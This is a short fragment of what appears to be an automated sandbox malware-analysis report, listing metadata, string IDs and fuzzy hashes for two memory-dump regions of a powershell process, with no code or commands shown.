                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79925432572.00007FFCF4200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4200000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4200000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: BNv*$Xz+$Xz+$`7K:
                                                                                                    • API String ID: 0-3782686236
                                                                                                    • Opcode ID: b084eb825522f7f4f23ba2872b26077b9d779acb2f426245560d6c48fe5d4b96
                                                                                                    • Instruction ID: ad2f5e07d2b76ae106756c519e99f3c4251db184f6690669d94620056aeab335
                                                                                                    • Opcode Fuzzy Hash: b084eb825522f7f4f23ba2872b26077b9d779acb2f426245560d6c48fe5d4b96
                                                                                                    • Instruction Fuzzy Hash: 3791E222E1CA8A4FE759E72C88B6174B7D2FF64301B9801BAD46DC72C3DE25AC05C361
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79925432572.00007FFCF4200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4200000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4200000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (}+$H|+$H|+$J{v*
                                                                                                    • API String ID: 0-1283508578
                                                                                                    • Opcode ID: 2e83372ac02f1008786c4dd403e42e1131324933ac04783443f24e69f1fd0af9
                                                                                                    • Instruction ID: 772e4995e049a4258629ebb9a6f884f8ac4223e8dc836cdd79f46a44fc713612
                                                                                                    • Opcode Fuzzy Hash: 2e83372ac02f1008786c4dd403e42e1131324933ac04783443f24e69f1fd0af9
                                                                                                    • Instruction Fuzzy Hash: 1351DF31E0DA9D4FEB99DA5CC4A5278B7E2EF55301B1801BDC05DC71C6DE2AAC45C721